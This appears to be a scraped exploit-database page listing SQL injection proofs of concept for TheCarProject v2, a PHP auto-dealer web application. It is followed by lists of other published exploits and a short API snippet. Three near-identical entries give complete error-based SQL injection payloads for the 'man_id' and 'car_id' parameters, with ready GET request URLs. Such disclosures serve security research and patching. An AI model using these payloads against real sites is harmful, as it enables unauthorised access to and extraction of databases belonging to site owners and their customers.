Search for hundreds of thousands of exploits

"TheCarProject v2 - Multiple SQL Injection"

Author

Exploit author

"Mehmet EMIROGLU"

Platform

Exploit platform

php

Release date

Exploit published date

2019-03-18

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
===========================================================================================
# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
# Dork: N/A
# Date: 17-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://thecarproject.org/
# Software Link: https://sourceforge.net/projects/thecarproject/
# Version: v2
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: A fully Featured Auto vehicle, Auto Dealer php
sales web site software
  built on Bootstrap 3 it will present the best possible viewpoint for
your customers
  unlimited items, unlimited images per item. Totally driven from the
admin side of the site.
===========================================================================================
# POC - SQLi
# Parameters : man_id
# Attack Pattern :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
# GET Method : http://localhost/TheCarProject/cp/includes/loaditem.php?man_id=-1
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: TheCarProject v2 - 'car_id' SQL Inj.
# Dork: N/A
# Date: 17-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://thecarproject.org/
# Software Link: https://sourceforge.net/projects/thecarproject/
# Version: v2
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: A fully Featured Auto vehicle, Auto Dealer php
sales web site software
  built on Bootstrap 3 it will present the best possible viewpoint for
your customers
  unlimited items, unlimited images per item. Totally driven from the
admin side of the site.
===========================================================================================
# POC - SQLi
# Parameters : car_id
# Attack Pattern :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
# GET Method : http://localhost/TheCarProject/cp/info.php?man_id=3&car_id=-1
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
# Dork: N/A
# Date: 17-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://thecarproject.org/
# Software Link: https://sourceforge.net/projects/thecarproject/
# Version: v2
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: A fully Featured Auto vehicle, Auto Dealer php
sales web site software
  built on Bootstrap 3 it will present the best possible viewpoint for
your customers
  unlimited items, unlimited images per item. Totally driven from the
admin side of the site.
===========================================================================================
# POC - SQLi
# Parameters : man_id
# Attack Pattern :
-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
# GET Method : http://localhost/TheCarProject/cp/item_listing.php?man_id=-1
or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
===========================================================================================
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
Release DateTitleTypePlatformAuthor
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-26"OpenEMR 5.0.1 - Remote Code Execution"webappsphp"Musyoka Ian"
Release DateTitleTypePlatformAuthor
2019-07-08"Karenderia Multiple Restaurant System 5.3 - SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-07-05"Karenderia Multiple Restaurant System 5.3 - Local File Inclusion"webappsphp"Mehmet EMIROGLU"
2019-07-01"WorkSuite PRM 2.4 - 'password' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-07-01"Varient 1.6.1 - SQL Injection"webappsmultiple"Mehmet EMIROGLU"
2019-07-01"CiuisCRM 1.6 - 'eventType' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-05-16"DeepSound 1.0.4 - SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-05-14"Sales ERP 8.1 - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-05-14"PasteShr 1.6 - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-28"Job Portal 3.1 - 'job_submit' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-28"BigTree 4.3.4 CMS - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-20"202CMS v10beta - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-19"eNdonesia Portal 8.7 - Multiple Vulnerabilities"webappsphp"Mehmet EMIROGLU"
2019-03-18"TheCarProject v2 - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-15"Laundry CMS - Multiple Vulnerabilities"webappsphp"Mehmet EMIROGLU"
2019-03-15"ICE HRM 23.0 - Multiple Vulnerabilities"webappsphp"Mehmet EMIROGLU"
2019-03-07"Kados R10 GreenBee - Multiple SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-03-05"OpenDocMan 1.3.4 - 'search.php where' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-20"HotelDruid 2.3 - Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-18"qdPM 9.1 - 'search[keywords]' Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-18"qdPM 9.1 - 'type' Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-18"Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload"webappsphp"Mehmet EMIROGLU"
2019-02-15"qdPM 9.1 - 'search_by_extrafields[]' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-13"PilusCart 1.4.1 - 'send' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-13"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting"webappsphp"Mehmet EMIROGLU"
2019-02-11"Webiness Inventory 2.3 - 'email' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-06"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-06"osCommerce 2.3.4.1 - 'products_id' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-06"osCommerce 2.3.4.1 - 'currency' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-04"SuiteCRM 7.10.7 - 'parentTab' SQL Injection"webappsphp"Mehmet EMIROGLU"
2019-02-04"SuiteCRM 7.10.7 - 'record' SQL Injection"webappsphp"Mehmet EMIROGLU"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46555/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.